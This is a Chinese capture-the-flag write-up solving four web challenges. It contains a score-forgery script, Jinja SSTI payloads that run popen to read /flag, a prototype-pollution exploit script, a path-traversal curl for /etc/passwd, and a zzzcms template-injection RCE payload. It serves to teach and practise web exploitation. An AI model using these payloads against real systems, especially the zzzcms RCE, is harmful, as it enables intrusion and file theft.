目录
dino3d
Text Reverser
cbshop
zzz_again
dino3d
进来是一个js小游戏
先随便玩一下,显示要玩够1000000分
直接console改分数会被检测
先是JSFinder扫一下,扫出了check.php
到js里关键词索引搜索check.php
搜索sn,发现传入的参数是score和checkCode
搜索checkCode
搜索salt
import requests
from hashlib import md5
import time
target = "http://node5.buuoj.cn:27231/check.php"
headers = {
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8"
}
body = {
"score": "10000000",
"checkCode": md5("10000000DASxCBCTF_wElc03e".encode()).hexdigest(),
"tm": str((time.time()))[:10]
}
res = requests.post(target, headers=headers, data=body)
print(res.text) 
Text Reverser
先随便测试功能
测出有对SSTI的waf
给一段字符逆向脚本
s = "待逆向字符"
r = s[::-1]
print(r){% print(7*7)%}
{%print ''.__class__.__bases__[0].__subclasses__()%}
找到os在132索引处
{%print ''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('tail /flag').read()%}
cbshop
先随便登录一下 ,有10元,但flag要11元
拿到附件审源码
flag位置在了/flag
admin信息
直接放控制台运行
成功以admin登录
现在钱是够够的了
但还是不能直接买flag
回头看源码,有这样一段逻辑
需要user.token属性为true
但代码中并没有定义token
可以在buyApi中利用assign打原型链污染
先令user.username为__proto__,污染Object.token属性
{"name": "/flag", "id": 2, "token": true} 打入污染
再以admin登录,去买flag,发现还是有限制要绕(就是传入的json数据不能包含flag关键字)
使用URL 实例可以正常读取文件,将 flag 进行url编码从而绕过
import requests
session = requests.Session()
url = "http://d6b2d3d7-8768-4eac-9cbb-f2f2be45b4ff.node5.buuoj.cn:81/" # 题目url
def login():
data = {
"username": "admin",
"password": "\uDE00admi"
}
session.post(url + "login", json = data)
def changeUsername():
data = { "username": "__proto__" }
session.post(url + "changeUsername", json = data)
def buyFlag():
data = {
"name":{
"href": 'file:///fl%61g',
"origin": 'null',
"protocol": 'file:',
"username": '',
"password": '',
"host": '',
"hostname": '',
"port": '',
"pathname": '/fl%61g',
"search": '',
"searchParams": "URLSearchParams {}",
"hash": ''
},
"id":2,
"token":True
}
res = session.post(url + "buy", json = data)
return res.text
if __name__ == '__main__':
login()
changeUsername()
flag = buyFlag()
print(flag)
zzz_again
XCTF高校挑战赛与zzzcms 2.1.4最新版前台RCE | Matrix
经过验证可以进行一个任意文件的读,但不知道flag路径,走不下去
curl -d "template=../../../../../../../../etc/passwd" -X POST http://node5.buuoj.cn:29834/search/
再去搜RCE的洞
Vuls/zzzcms/zzzphp V2.1.0 RCE/zzzphp V2.1.0 RCE.md at main · metaStor/Vuls · GitHub
直接照着打也打不通,高版本模板注入RCE入口的location估计不能是search了
进入解析模板
解析location
当location=list时,跟进parserList
最后进到parserListPage
发现其是从url中接参,最后做一些简单的拼接并替换掉正在执行的模板文件
一顿逻辑走下来后发现没有waf,到此我们就可以成功得到恶意的模板文件
接着再来看parserIfLabel对模板文件是怎么处理的
dangerkey有waf处理
过掉waf后可以往下走到eval拼接命令执行
最终payload:
/?location=list&aaa={if:=strtolower("SYSTEM")("cat /f111l00g")}{end if}&aaa=111
![452. 用最少数量的箭引爆气球[排序+贪心]](https://img-blog.csdnimg.cn/direct/fc79feb2102d4bb0932efa891777eedd.png)
